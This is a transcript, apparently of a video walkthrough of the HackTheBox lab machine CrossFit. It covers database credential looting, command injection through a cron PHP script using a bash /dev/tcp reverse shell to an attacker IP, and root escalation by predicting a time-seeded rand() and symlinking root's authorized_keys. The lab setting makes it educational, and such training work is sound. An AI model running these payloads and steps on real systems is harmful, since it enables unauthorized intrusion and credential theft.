repo and see if there's any security vulnerabilities in it. So if we look, escape args is not working properly. And here he's saying he's able to get RCE with this. So escape args is set to true, but escaping is not happening. So let's try this. In order to try it though, we have to get a file because it's looping through each of these files. So we have to figure out what this message dir is. If I cat any of these files, I do not have permission to go into them. So the includes directory is owned by Isaac and vendor is owned by group Isaac. All these others is group owned by admins, which we're a member of. That's why we can see it. So let's cat send updates again real quick and copy this. And we're going to just put it in our notes. So Hank, PHP, and we can add notes. So we don't have permission. Let's see. Unknown directory. So since that's an unknown directory, we can't loop through it. And this is probably vulnerable. And this file was, we can copy send updates.php. Send updates.php. There we go. And then what we can also do is link the GitHub. So if we go here, paste PHP shell command has a bug. Let's do a link. There we go. If I preview this, looks good. Okay, so now we have to figure out exactly where this messages directory is. So let's cat etc passwd and see what we have. There is a ftpadm under srv ftp. We did get a file. So way back, if we go into, I think www is where we copied it, .env. So if I cat.env and db, we have, well, cat db first. We have credentials. So Crossfit, db pass. So if we go here to loot, and we have credentials, and this will be SSH, Hank, Powerpuff Girls, and maybe better to do this as a table, I don't know. MySQL, CrossFit, and let's copy this. And let's look at cat.env and go up. We have FTP hosting as well. FTP hosting, like that. So let's try, let's see, cat etc passwd, ipsec, oh, this is my box. We have passwd here. So ftpadm has no login, but we should still be able to get if it's a valid password or not. So I just pasted the FTP hosting password. Oh no, that's the CrossFit password. And let's try FTP hosting. Paste this in, and we get authentication failures. So the next thing I want to do is look at FTP hosting. So we can do MySQL -u FTP hosting -p, paste the password, and then we can do show databases. Use FTP hosting, show tables, select stir from accounts, select stir from failed jobs, select stir from migrations. Nothing too interesting there. Select stir from users. And we don't have the FTP admin. Okay. Let's try the next user, which was Crossfit. And we can look at this. Hank. Let's see, FTP hosting DB. Nothing here. CrossFit DB. Show databases. Use CrossFit. Show tables. So we got messages. So this is looking promising. So select stir from messages. Describe messages. We don't really have anything. Describe roles. We get security report. Select stir from security report. Nothing. Select stir from trainers. And the next one is users. So trainers doesn't really have anything. Users and users doesn't have anything. So both databases don't have anything. And CrossFit DB, no real juicy info. Okay. So the next thing we can do is look at where this FTP user's used. So I'm going to cat etc passwd so I can put them on my clipboard, because it's always best to copy and paste instead of type. And I'm going to grep ftpadm on/etc. Let's see. I'm going to hide error message. So to dev null. And this is all the files ftpadm is in. So he's in the vsftpd user conf, etc group, and it looks like we have a PAM auth with a password. So let's try, let's put this password in. So go to a loot. I'm going to call this FTP probably. And I went to FTP instead of SSH because he has that no login shell on passwd. So let's go and back to our FTP command, which I don't think we have anymore. So we'll have to retype that. So let's do that here. I'm going to label this Hank. This will be, well, we can get rid of this pane because we're not using this anymore. This will be www data. There we go. Close this, close that. Trying to stay organized as we go. So the thing we want to do is lftp. Do I have ups? I do. So we need that SSL verify. So force verify. Then we can log in with ftpadm. And his password, let's put it back from the clipboard. Paste. dir. We have to connect. Connect 1010 10 208. dir. Sending commands, waiting for response. Login incorrect. Let's try logging in after we connect. What? Login ftpadm. dir. Connecting, logging in. There we go. So you want to log in after you connect. And we have this messages directory. So I'm assuming this is where we want to be. If we do a dir, we have nothing. So I'm going to touch message and let's please subscribe to IPsec. I'm going to tell them to subscribe to us. It always helps. So we can put test. And before we put test, we want to go back to the source code. So let's go back to Hank. Let's make this pretty. So now we can enter this loop because we have a file. So we can enter in here. We want to select email from users. So we want to put something, a command injection in email. So let's connect to the Crossfit database. So let's go back to Hank. And we can close out one of these shells. Would I write that? I think that was in dev shm. ls dev shm. No. Shoot. I don't know why I wrote my linps. Oh well. You should put linps inside of Obsidian. I'm not going to because I screwed up linps twice. So mysql-u crossfit-p, and we want to go to the loot table, and we want the CrossFit user. Paste. Use CrossFit. Show tables. Describe users. So this ID auto increments, and it's a primary key, so we could specify the key, or we don't have to because it auto increments. So I'm going to do insert into, or is it update? No, it's insert into ID, email. I don't know if I put it in quotes. Values. I think this is it. Test. CrossFit ID. So it's not insert into ID, insert into users. There we go. Yeah, this works. So let's try basic command injection. Bash-c, bash-i, And I'm going to put these as double quotes because I want to use the single quote. So bash-i like that. Dev TCP 10.10.14.4 9000 0 at and 1. Single quote. Single quote. Put a semicolon at the end. And so that will, what we just did is we put a semicolon here to escape into running a command. And then we put a semicolon here in case their script added anything here and it made our bash command invalid. So that's why we put 2 semicolons. And that looks good. So nc lvnp 9001. Let's put that in, put our message. We probably have to go, we are in messages. Okay. And let's do select star from users. And we have our command. So when this command exits, because it should probably clear the row, then we know something screwed up. But the command's still there. And we got our shell as Isaac. So we can go back to our notes and go to Hank. Let's see. Let's go into edit mode. And then we can command injection works, command injection to Isaac. Creating a file with ftpadm account via ftp plus putting shell in database email column. I'm just putting a note here so I know what I did to get in. And now we can do 45-Isaac. And we can copy this. Shell as, is it ISAAC? Yep. Shell as Isaac. Awesome. Let's go see if we can create an SSH key real quick. cd.sh. I'm going to exit this. Let's do ssh-keygen-f. I'm going to call this Isaac. Okay. Cat Isaac.pub xclip selection clipboard. Then echo dash, we don't need the dash n. Paste to authorized keys. chmod 600 authorized keys. chmod 600 Isaac sh-i Isaac at 10.10.10.208, and we specify the key, which is also Isaac, and we get in. So let's create new thing, send this to 3, and we'll label this Isaac. So I know the logic here doesn't make sense because Isaac is after Hank, but I cleared up this pane, which freed up the number. So that's why it went to 3. So now we're on the system as Isaac and have a good shell. Let's just do some basic enumeration around Isaac. So I'm going to do groups, Isaac. He's a member of staff, FTP, and admins. I don't know what the staff group is. That's new. Hank was not a member of staff. We can try sudo-l. Sudo is actually not found, so sudo isn't installed on this computer. We can do like a ps-ef, and one of the weird things is we're not seeing any processes from other users. Like we don't even see a reverse shell from Hank. This is accomplished through just hiding PIDs. It's part of Linux hardening. If we cat etc fs tab, we can see /proc is mounted with hide PID equals 2, which is going to hide the processes of other users. You can also look at etc mtab, which is a list of active mounts. fs tab is at boot time, mtab is active, and we can see if we grep hide, we have it also there. So it is hiding PIDs. Let's see, shell as Isaac. Let's do grep proc etc fs tab. And I'm going to paste this. Let's do psef. There we go. This is what I want. Copy. PID of other user hidden. Bash paste. There we go. And I'm going to put a line break there so it's a bit more clear. There we go. So let's see. Let's figure out what that staff command is. So find, or not staff, staff group dash staff dash, let's see. Is it find slash dash group staff dash ls, and we'll hide errors. So what we just did is or just looking for files owned by staff. I can do less dash capital S to put it in a bit prettier. So Python, and that's about it. Varfonts.uuid, Selenium. So this is probably doing some how the cross site scripting piece works. They're using Selenium, which is like a way to hook Firefox, Chrome, whatever, just various browsers, and then navigate to pages. It's like the Python request module, but just on steroids. You're using the full browser. So nothing too interesting by doing that. We can say find slash dash user Isaac and see if he has anything. His home directory isn't too interesting to me. Proc isn't too interesting. Is there anything after proc? Let's just do grep-v proc. And we want to also exclude sys. So there isn't really anything interesting owned by Isaac on this system. So the next piece I would be is let's look for a user.txt, find slash home, dash name, is it dash name or dash dash name? User.txt, home hank user.txt. Okay, so it was modified March 17th at 7:33. So we should look for files around this time. Going back to our find command, we can just do find slash instead of dash name. We can do dash newer mt 2000. I guess is this 2021 or 2020? Stat this. Does this give it 2021? So let's see. I don't know, I'm keep going back to find. I mean, I can just type find space slash, but newer mt 2021-03. Let's do 12 and then exclamation point, newer mt 2021-03. Let's say 22. So we got 5 days before and after. 10 days is a pretty big window to look at. I always like adding dash ls to dev null less dash s. Okay, so we have a lot of things in run. March 17th. Is that today? Oh, that is today. Shoot. I was like, why is this box having things of today? Because of how HackTheBox does flag rotations. So instead of that, I'm going to do May 2020. Okay, that solves everything. Yeah, HackTheBox drops flags when the machine boots up, so it would be today. Let's see. This is between May 4th and May 9th. So I think May is month number 4. This is going to be one of those weird things where I don't know the orders of the numbers of the month off the top of my head on the spot. Month order of May. May 5. For some reason I was thinking July was 5. So 05. Always helps to just Google when you have a question. And you know what? I could have just statted the file and got it in this date format and then not shown that silliness. I can remember everything except for that. I don't know why. May, let's do 14th. Okay. So let's see. We got user bin. And on May 13th, we got DBMSG, which is unique. And we got a bunch of Python stuff. So what I'm going to do is we'll grep-v Python. There we go. So let's see. Firefox DBMSG is sticking out. But you can see everything they installed. Let's narrow this window down. Actually, I don't know if that'll help too much. We may want to get rid of run. So Python run. We got a bunch of user lib modules, boot, dev. Wait, why is it going to March 18th? Oh, I did 2021. I was like, things in dev shouldn't be showing up. Those are created new. So the web page, dpackage stuff, PAM stuff. That DBMSG, that's interesting. If I go to my box, I don't have DBMSG. I have dmessage, but not DBMSG. So I'm guessing that's like database message. And that could be put on by something else. So let's go into user bin and stat DBMSG. And that's unique. I think this is user put here because we see, well, never mind. We do see a bunch of zeros. Stat star, grep, modify. Okay, so there is a few files that don't have that. What was that printf command I did in a video before? So what I did there during that brief pause, if you were keen enough to notice, is I just paused it, went to ipsec.rocks, and then typed timestamp and talked about this. I get all the like names of time wrong, like the units of measurement, but this section of compromised is really good. So what we're going to do is do ls-lt-time style equals full ISO. And this shows all those timestamps like we did with the stat command. So we can just grep-v on all these zeros because the package manager is going to strip off anything after a second. So we can grep-v, and we do see a bunch of symlinks. So let's also hide those symlinks. So let's do this like that. And the only file that comes left is DBMSG. All these zeros is suspect. So it went to, I guess, nanosecond. And I'm guessing all these are probably because like maybe SCP by default copies nanosecond. And that's why that's there. But these being zero is suspect. So just another thing about timestamp forensics that you can use to find when files got there. So now this file is really suspect because it's in user bin, which is not where like you should drop files. This is a package manager location. This probably should have been in user local bin because this is where I think users can drop files by default. I don't know everything about Linux off the top of my head, but In this directory, this timestamp makes more sense because the user probably installed Composer and it compiled and copied it to the folder. So if DBMSG was in user local bin, it may have stuck out a little less because right now, this definitely doesn't belong because you look at this, there are almost 1,000 programs in here, and this is the black sheep of the programs. There's yet another way we could find DBMSG. If we used like process spy, so if we go into home and let's go search process spy GitHub, it's just called pspy, and we'll download the release. So if we download release, let's download 64 small, save file, and let's copy this real quick. I want to go user bin. I just want to get a log file of this. So copy. So we want Isaac. So we found it via this. And also we did newer empty. Just logging the commands we ran. And I guess, where's DBMSG? We can copy this. Come on, snip. There we go. Great. So this is modified files around. You can put this find and nanoseconds on timestamp and user bin. And then the next thing is going to be pspy. So we downloaded that. Let's go in cp downloads pspy python 3-m http.server, and let's go to dev. Let's see, grep etsy fs tab dev. Let's just do mount grep shm. Okay, I just want to make sure it wasn't mounted with no exec, because if it was, we wouldn't be able to execute this program. wget 10.10.14.4, at least out of the temp directory. So we download pspy, chmod plus x, pspy. We'll probably want to do -f to do file system events, because again, that hide PID thing is there to prevent us from seeing processes get executed. But we can see when file systems get opened. So if we just wait here for a little bit, we'll probably see something along the lines of, what is it? DBMSG opening. So let's see, go B. I'm probably going to remove that banner. So we do this, go back here, bash. We do not need this banner. Snip. And then we can snip again. We go back here. Is DBMSG here? DBMS, it is. So grab, paste. I don't really like this way of finding it, because if this box was active, it's going to be really hard to find this. I like finding the file through the above methods much, much better. So this is going to be pspy with file system events -f. Okay. So the next step to do would probably be download that DB message. So let's open up a new pane, nc lvnp 9002 to DBMSG. Go back to Isaac, cp user bin, db message to dev tcp 10.10.14.4 9002. We just want a cat. Let's see, md5 sum db message and md5 sum user bin db message, md6, I don't have that, 35 and 35. So we are good. So now we can begin reversing this DB message application to see what it's all about. So let's spin up Ghidra. So opt Ghidra, Ghidra run, and it's going to load up the splash screen telling me, well, my version is probably out of date, 2020 November 13th, probably should update that. Then I'm going to click this little dragon icon to open up the disassembly window. I guess that's what it's called. I don't know exactly what it's called, but it opens up this, and then I hit I and click on the program I want, which is DB message. It's going to ask me, is this the type of file format you want? It's an ELF. Yes, it is. Click OK, and then it's going to ask me if I want to run all the analysis, and the answer is yes, I want to run all the things. So I select all and click Analyze. So now if you look at this bottom right, it's going to show the analysis, and it's already done. We can look at the imports to see what libraries this program uses. We have libc, that's no surprise. libcrypto, not really a surprise. libmariadb, it confirms that this is a database message probably, because libmariadb is accessing MySQL. If you didn't know, Oracle bought MySQL, and then they forked MySQL to MariaDB to keep an open source version. Then you have libzip. So the next thing I like looking at is the exports, and this doesn't look like it's stripped, so we have all the like process names and everything, which is super nice. We just go to main to see how this program starts. So we have get effective UID, and this program must be run as root, and then exit if it's not. So must be root. Okay. Now we'll go doing something with time. So this is getting the current time. So current time is equal to this, and it's calling it with null, that's fine. And then we're passing current time into SRAND to generate the seed. And this is kind of a insecure way to do a seed. It's probably safe against like remote attacks, but if someone's on the system and can see when this program was started, they can guess what your seed is for random and then potentially break it. So let's go and do comments, set a pre-comment, seed based upon time. And then we'll add the comment, hit print screen, and we will highlight this, do a block, and oh, I want to copy the top right there. Okay, so now let's send it to clipboard, then go into our Obsidian and then say 50 reverse engineering, put it in the folder. I'm sure there's a better way to do that. RE of DBMSG. And then the very first thing is going to be SRAND based upon time. And this is a super common way. I think I said that. If we go to Google and let's say secure SRAND seed, proxy is refusing connections. My burp suite is closed. Why do I have a proxy set? Edit. Let's go and edit this. What is proxy? So what happened here is I had to cut to do some work, and I opened up a private window and set the proxy. So yeah, recommend way to initialize SRAND. Let's see what this says. Reading data from urandom. That's probably a good way because that's going to be random. This one is saying, hey, let's use time. The best way is just to use time. So, yeah. This one's using something with the clock. So, it's pretty common to see SRAND using just the time as a seed. And as we'll see, we can potentially exploit this. So the next thing it does after it sets the seed is go into process data. And now we have a bunch of intimidating text. But let's go through this and see if we can figure out exactly what it does. So let's see, MySQL init. So this is probably going to be the MySQL handle. And I don't know if any of this terminology is going to be correct. I'm not a reverse engineer. It's just kind of how I understand things. So that failed. Now we get the connect. And we have a hard-coded password. So again, it's not a big deal because we already knew this password. But if this was like an actual engagement, I would be highlighting it. So we can do that. And then also put it in a box. And then copy it to clipboard. Go here. Hard-coded password. And I think it's process data. Paste that image. And if we look at how this looks, we can see looks pretty good. Okay, so the next thing, this ivar3. Let's see. I don't know what ivar3 is yet. We'll just say MySQL connect ? So it connected. Maybe ivar3 is response. So this may be error handle is what I'm going to call it. So it's going to connect, and if the error handle is equal to 0, exit with error. Maybe it's not error handle. I don't know. Let's put a question mark here. There we go. And I just do the question mark, so if I see it later in the program, I know I wasn't positive about exactly what that was. So this looks like it's going to be the query. So this can be messages table rows, or we'll say rows messages table. There we go. So if there's, let's see, if rows messages table is not equal to 0, exit with error. Store results. Maybe this is a question mark, and this is another error handle. And this may be the results. Rows, messages, table 2, question mark. So later I know which one is which, because this one is storing the results. So this is probably just did the command work. And then this is that. So we got zip open now. So var backup MariaDB comments zip. So this is going to be zip open. So this is zip. I'm going to call it fzip, so for file zip. And then it does file name. This is probably the mode. Let's just Google, what is it doing? Zip underscore open. Zip open. And go to the documentation. And let's see, zip open, path, flags, and error. So this could be like an error handler. Int error p. Let's see, if an error occurs and error p is not null, be error code. Okay, so maybe zip error, question mark. And if I see that and later on, I'll know this is the file handler for where zip goes, like zip data. And this could be the error code. We'll see exactly what it is. So if zip is not equal to 1, or not equal to 0, so I'm guessing if zip did not error, it goes into here, and it's doing MySQL fetch rows on table 2. So this is probably going to be the data. So rows table. And this may be, instead of question mark, error. Okay, so we're in the messages table now. Let's see, we don't know, well, 38, this could be row. So maybe this is row. I'll do a question mark as well. So we'll say message underscore row. And then uvar is equal to rand. So this is RND. sprintf. So let's see what this error handle question mark is. This is probably MySQL row. This should be message row right here. I think it reused a variable because I can't, okay, I can Control Z. So this handle error, it's saying this message row is equal to this. So this is why I'm doing message row now. This is going to be message rows. I don't know. Following me in a debug is probably not something that is good for anyone's health. So let's see, right here, there's going to be the output variable of this. So this looks like it's going to be RND plus message row. So, and it's going to be limited to hex 30 bytes, so 48 bytes. So this is RND plus message row. And that's going to get the length. So length of RND message row. Let's see, this local F8 is probably going to be the output of MD5 sum. So MD5, it's doing of, let's see, RND plus message row. So I knew that was this because down here in this next sprintf, it said local F8. So based upon MD5 sum, it's saying it here. That's why I thought that. So MD5 sum RND message row. Okay. So we're doing the same thing. So local 98, this is going to be file path of 30 hex, so 48 bytes again, 2 strings this time. Before it was 1 digit, 1 string, so that's why it was ulong here. So we're combining these 2 strings, RND and message row. So maybe file path can be for local RND message row, like that. I don't know if that's helpful. Local 40, and it's going to open this and then write the data. So open, local 40 is going to be F output. So we kind of have an idea what's happening. At least I do. So let's see, can we easily show this? Let's go, where is this? Select start from messages. This is a good spot. So let's open up Flameshot again and copy this. If output file fput. Let's go here. Okay. So very first thing is going to be SQL query. And we can put text right here. SQL query. And I can highlight this and control shift wheel up to make it bigger. I don't know exactly how to move the text. I'm sure there's a way. We can change the color and things, but it's not needed. Not publishing this blog post, so it's who cares how clean it is. Just showing you what you can do. So it does this. It's going to open this zip open. This one, I don't think we really care about. Then it's going to use this rand again. And this one's darker because if you look in the top whatever when I do the scroll wheel, it was just add a number other than 0 when I started. Unfortunate, but again, it's a pain to clean up. If I wasn't conscious of your time I'm wasting, I'd clean them all up. So this is going to be using random earlier SRAND initialized to time. Let's see, using random maybe for file name. Yeah. Okay. And then right here, this file open. Whoops. Let's go down to 0 so I can not block out text. And here we can do text opening file based upon earlier, let's say, insecure RND. So right now, hold on. I want to include the fputs. Let's see. Shoot. Sometimes boxing things is harder than you expect. There we go. Then we can say writing to insecure location due to RND being known. There we go. So now we can copy and paste the exploit. And then we look at this, we have really nice annotations in our screenshot. I should have made this one a bit bigger so we can grab the bottom of the row, but oh well. So now we have the exploit. We have to abuse random. So we have to create a program that will let us generate our own random. And what we're going to do is, as long as we can write in var local, which I think ADM can, let's go to Hank or Isaac. Isaac here. There we go. If we go to var lsla, let's see, local, staff can write to local. If we do a groups on Isaac, we're a member of staff. So that is the important thing about his group. We can write a symlink here. So we know this program is going to attempt to write to var local and then MD5 sum RND message row. And it's got to be a max of 48 characters. So if it goes above 48, we got to do some truncation. But it's going to try to write to this file. If we get ahead of the write and create a shortcut here and point like an SSH key to that random file, then it won't create a new file. It'll write to this file, which is alias to root, which this application must run as, and we can write to root's SSH key. So that is what we're going to be doing. The very first step is to go here, and we have to create our exploit. So make dir pwn, then we go into pwn, v ran.c, and we have to create a program. So let's do all the standard definitions, stdio.h, then stdlib.h, and we want time because we're going to play with the time. So int main void, let's do it like that. There we go. And we can say time t is equal to, or the casting of the variable is time. Current time is equal to time null. So that's just going to set our time. And then we can create a seed. So seed is going to be current time minus current time percent 60, which is going to be modulus 60 plus 61. So what this is going to do is get us to an even number minute. So go to next minute plus 1. So what this 60 does is if we were at, let's say, 116 and 41 seconds, this percent 60 is going to get rid of, it's going to come out to be 41, and then minus from that current time. So we go straight to 116. And then we go ahead at 61 seconds. And I do 61 seconds because I'm assuming by the time the program gets to that file write, it's going to be 1 second from when it's ran, which we're just going to guess it's ran every minute right now. We could do like this in a loop and create a file for every second in a minute and definitely get it that way. But yeah, that's the plan. So now we're going to do SRAND on seed. So now we just set our seed to this. So now when we call random, so print f, %d for digit, rand, we get what we want. So we can return 0 and exit. So if I gcc-o rand.c, and we execute rand, we get a number that's going to change every minute because we're only going up 1 second. So we have that. And the next thing we need is going to be probably the shell we want to execute, I'm guessing. So message row. So as long as we did that piece correct, that's good. And this message row, is this truncated to, where's the truncation coming? So sprintf rand plus message row. Okay, so this is 48 bytes. So we're capped to 48 here. And this is, let's see, echo-n, wc-c, 10. So I think we can have 38 characters that we need next. And something's not striking me right. Let's go back to this. And this select star, this is actually selecting two things. It's probably got ID and messages. So one of these rows is wrong. It's not grabbing both. I'm guessing right here, this is potentially going to grab the ID column. So let's say, whoops, row ID. sprint, there we go. And this is message row or message ID. So I think this is it. There we go. Clean that up. Probably should clean up the screenshots, but oh well. The trouble when you document as you go, sometimes you make mistakes and have to redo documentation. But on the plus side, if I didn't document that, it may not strike me as odd. So message ID, and we can control that. So what that's going to be is, if we go to Isaac, it doesn't really matter who we go to, MySQL-U, Crossfit-P, and we can go to our creds table, so loot, let's see, creds, Crossfit, grab this, paste the password, use Crossfit, and then show tables. We can describe messages, and this is where it's selecting from. So it's got 4 potential things it could be. And I think it executes out of message. Does it ever execute? Oh no, it's not executing, it's just writing. So it writes something to message, I believe. Where's put? Yeah. So message rows 1, 3, 2. These are columns. So 0, 1, 3, 2, probably. So what we can do is insert into messages and then say ID. Doesn't really matter what we write. We can put it into the name, I guess. Values, and we can say, let's do 9001 and a private key or a public key. So let's go back here. Cat, let's do, was it Isaac.pub? We'll just use this key. So copy, paste, Okay. And we probably want to SSH as Isaac. So let's get two windows going. SSH-F. Was it here? Yeah, SSH, -I, Isaac, then Isaac at 10.10.10.208. And we can go cd var, is it local? Is that what I was writing? Is var local staff? It is. So now we can do ln-s, and we'll want to combine what's in RAND plus the date. And the first thing to do is make sure these machines are in sync. 929, 125, it is not. So let's just copy the random binary over. So -I, Isaac at 10.10.10.208, dev shm, and we can do pwn rand. So /dev shm pwn chmod plus x dev shm, not pwn, we called it rand. What? Let's just copy it to temp. There we go. Temp rand. We get a number. Awesome. So what we want to do is get this number and then add 9001 to it and MD5 sum it. So let's do date. We're at 55 seconds. So we want to do this. It's got to be a minute. So now we can run it again. And we will grab this and say echo-n this 9001 MD5 sum. And we can do ln-s root SSH authorized keys to that link. Now we have it pointed there. And when we put this in the database, email doesn't have value. What? Insert into name, let's say ID email. Name doesn't have value. Let's say comma name. Message doesn't have value. I guess we have to put everything in it. Data too long for email. So let's put, this is message and email. What? There we go. Select star from messages. That looks fine. Hopefully that's fine. If we do a date again, we got 20 seconds left. We can, real quick, potentially do echo, because I'm not sure if it's got the line break or not. So ln-s root SSH authorized keys to this. Did I get it in time? I did. So one of those files, oh, it only created one of them. Shoot. Date. Well, we can't cat the file because we don't have permission to that SSH key. We can try ssh-i Isaac root at 10.10.10.208. And does it let us in? It does not. So we did that incorrectly. If we select star from messages, that's gone. So we can write this. And what we can do instead of symlinking is, well, I think it's going to delete the file when it's done. So that won't work. So C9, C59, that's the one we did. So I'm going to do this with out the -n. So we want to do /rand or temp rand, and then copy this. I probably should have made the C program give me the whole file. Echo 9001 md5 sum ln dash, is it S? Root SSH authorized keys on this. Date, we got 30 seconds. So I want to go back and look. C59. Yeah, I'm pretty sure when I did this, it overwrote. So let's see if this works. Date, 5 seconds left. 57, 9. Okay, it should be running. And can we get in? No. So I'm going to take a step back and we're going to try this again. /temp rand. Did my temp directory get written over? Looks like it did. So, yeah, that sucks. We got to copy that file back. So let's go over here, scp, copy the file. Probably should copy to his home directory or somewhere else because it getting deleted is annoying. Let's just try echo-n temp rand. And let's put this in $ like this, 9001. Awesome. MD5 sum. That makes it easy. So now we can go back to this insert command. And what I want to do is let's change this. So let's go in order, which I think was name, email, message. So let's get out of this. Oh my God. There we go. Name, email, message. Is it MSG or I think it's spelled out message. And then we'll delete this whole key. We probably should just reformatted this whole query because this is going to take a while. I'm sure there's probably some hotkey I can use, maybe Control D. No, we'll just delete it all. But what I'm going to do is split up this SSH key in these parameters, and we'll go back to Ghidra and look at the order it does it, so we know where to put it. So the name, let's go back here. Looks like probably name, email, message. So we'll do here cat isaac.pub. So the name's going to be sh-rsa. We can do ipsec at parrot, which is the end here. I'm just putting these in parameters. Shoot. Oh no. We want to copy this key. So copy this. And paste. Okay. That looks good. So this MD5 sum, temp rand doesn't exist anymore. SCP awk print 1. There we go. So now we have that. We can look at the date. How long do we have? 20 seconds. That's fine. So do this. Use Crossfit inserted, and then we want to symlink this ln/root/.sh authorized keys. I probably just missed that window. -s date. Yeah, I missed it by a few seconds. So we can run this command again. Make sure this is in the database. Is it in twice? Probably not. Stir from messages. Okay, it's only in once. So we have that ln-s root ssh authorized keys to this file. Date. We got 20 seconds left. And as long as we got this working, it'll be awesome. But who knows if this will work. And we can try sh Isaac root at 10:10:10:208. Date, 2 more seconds. We should be good. And we're in. So that was it. If we wanted to, what we can do now is cd/root/.ssh cat authorized keys. I was going to see if we could see like failed attempts. If we did not concatenate it, so we did, let's say 1, 2, 3, I think. No, we just want 2. 1, 2. And we put this all in one line. Let's see what that looked like real quick. So we did this, and this did not work. So were we just slow, or did something weird happen? So message name email. And what I want to do, where is my thing? Right here. Touch T. Okay. That looks good. Let's run our command again. And then copy ln-s root sh t to that. Date, please don't be, okay. We have like 30 seconds until this will execute. So cat t, and what I'm assuming is maybe there's just some weird like characters that are bad in this, but we'll see. Date 45, so 15 seconds left. Cat t still nothing. 51, 45, come on. 3 more seconds. 59. Okay, so did we write into T? We did. And what happened is it began with a space, and that's probably what broke it. Did our insert command begin with a space? It didn't. So what happened is the printf is putting a space between each of these strings, and because it goes like name something email, was it name? No, name email message. So because it does that, we put name as nothing. So it begins the string with a space, I believe. Or maybe this was a space. A space got inserted at the beginning of the string, which broke the format of our authorized key file. So that's why we put this to be sh-rsa. So if we do comments, I know there's a hotkey, but we set this to be sh-rsa. And then we set this to be the name, which was ipsec at parrot. And then this one was the key, I believe, is how we did it. Comments, P, the key. So I think that's exactly what we did. And by setting each of these, we didn't inject spaces, which broke the formatting. So hope you guys enjoyed that. But before we get to the very end of the video, I want to go through and clean up our notes, so we have one big nice file. This loot page is mostly good. There are 2 things I'd probably want to add to this. The first are local users. So we can do local accounts. And then we go over to our shell. We can cat etc passwd and maybe grep for ends in sh. sh $. That's it. And then we can awk print 1. like that, and grab this -f colon. -f is going to be field separator. So we got 3 users on this box. And just good information to have. So with that, I think my loot page is good. This is what it looks like, which is fine. The next thing we have is common enumeration. So let's check this. This looks fine. Grab SSL banner FTP. That's fine. GoBuster, we didn't really get anything. Subdomain via cores. And subdomain found via FTP. So here we may just want to add exactly what we did. So upon an HTTP header having a valid domain in the origin line, it responds the response. So let's see, upon an HTTP request header having a valid domain in the origin line, the response header will have will contain this. And I can put this in backticks. So HTTP request header, origin line, just putting emphasis on this response header. So now, since we have the emphasis, when we look at it, I think I like that. We could also just make it bold or highlight, but that's how I like it. Subdomain found via FTP. We did this one by XSS, so we can actually link this. So we go link 25 Gym Club XSS. I think that's where we created it. Creating user, yep. That created a user upon logging in. Upon logging in, it looked like the user's home was var dub. So look at that. Looks fine. And we also have a link. So I think I showed this before, but in case I didn't, you can see we have this linked, which is pretty cool. So common enumeration, link to Cross Site Scripting, link to FTP. So it's a pretty cool, like, mind map type thing. So we can go back to where we were. So common enumeration. That's done. Let's go to web pages. Open this. That's pretty much all we had. So virtual host, the FTP, or what we could do is go back in a log and take screenshots of like internal images. So if we went to, was it www Firefox index.html, and then we can take a screenshot of this to prove that we accessed an internal page. So let's copy, go over here and paste this. This will be ftp.crossfit.htb. This page was accessed via 25 Gym Club XSS. Does not appear to be internet accessible. So now when we look at that, we have some notes. That looks fine. Let's go to this. Gym Club user inputs. That looks fine. And what I'm probably going to do is reorganize this a little bit. And since we have things by fives, this makes it easy. So instead of web pages, I'm going to label this Gym Club. And we can put, let's see, actually, web pages. This is fine. Gym Club, CrossFit. Trying to think of a good way to organize this because I want like the virtual host to be up front, but I also want to go deep into each website. So maybe this can be virtual host overview, and we can say the other one was like, was it developer test, cat Etsy hosts, development test.crossfit.htb. No data here, or no page here, but ftpadm can upload PHP shells to gain code execution. Okay, that's fine. So here we want Gym Club website, and we'll do 2 flags for user inputs. That's fine. This will be Gym Club Cross Site Scripting attack. Detection, initial POC, browser. This one gets creating a user. Looks good. So checking a browser, didn't return a cookie, but it did display we had JavaScript execution. So I used the we here, and again, like I don't like that, but it did validate XSS injection was possible. Then this use XMLHttpRequest to return a page. This is an account. Sure, that's good. This is pretty bad. So we're going off of this. So we created a user. So we can do this. We can probably do one with FTP. Let's see. Uploading a shell. Contents of ip.php. And for this, logged in with an FTP account created via that. There we go. www to Hank. Okay, so we get shell as www data, linpeas, Hank's password. So this is showing us cron tab has Isaac running a script. And we can link this to 45 Isaac. This is the one where we had found vulnerabilities. Running a script that has a vulnerability. Cron tab, user logins. That is fine. So shell as Hank. Let's see. Following is from. That, sure. PHP shell command has a bug. What am I looking at here? Shell as Hank, FTP hosting, and CrossFit DB. So this is things we just poked at. command injection to Isaac, creating a file with ftp admin account via FTP plus putting a shell in the database email column. So what I'm going to do is probably just remove these databases. Or we can put it above this. Shell is Hank. So we'll say credentials to databases and either FTP hosting. No real juicy found in either that or Crossfit databases. Okay. Then this will be PHP cron script. And we can say this one is vulnerable. So Isaac runs send updates.php every minute, which is vulnerable to a command injection vulnerability if a file exists in, was it var something messages, maybe FTP messages. So it's vulnerable to a command injection vulnerability. Data in the email column of the users table within data within the email column can be used to execute code. This is triggered only if a file exists. There we go. Below is that. And I'm going to say that is messenger. I'm not 100% positive that's messenger. Maybe we'll confirm it later, but yeah. PHP shell command has a bug. Sure. We can put that here. So copy. Vulnerable to command injection vulnerability due to an outdated library. There we go. And this will be Mike Hart L -shell command. Okay, that's good. Command injection, we've already kind of explained that. Create a file with FTP, putting shell in database. Sure. Not perfect, but we're good. This, I'm not super happy with it, but we spent enough time making this report. I don't want to waste too much time of yours. So now we have all of this. So let's go into HTB. What we called it, Obsidian, HackTheBox, Crossfit, and we can cat stir to all.md. To all.md. So when I go here, we have one giant file. And if we view this, loot, common, grab, you can see just one big PDF for this box. We probably should have like an introduction and things like that. So this is where we'd probably go to Typora and put it into a template. Or if we didn't want to, we could just go here and export to PDF, page size, letter, sure, export, crossfit.pdf, and we could share it. And again, if you want to make this pretty, this is where you'd use Typora and import the Markdown so it actually fits a template. But, yep, right here's bad. It didn't really do that header for some reason. Probably need to put like an empty line break there. But I hope you guys enjoyed this video. Take care, and I will see you all next week.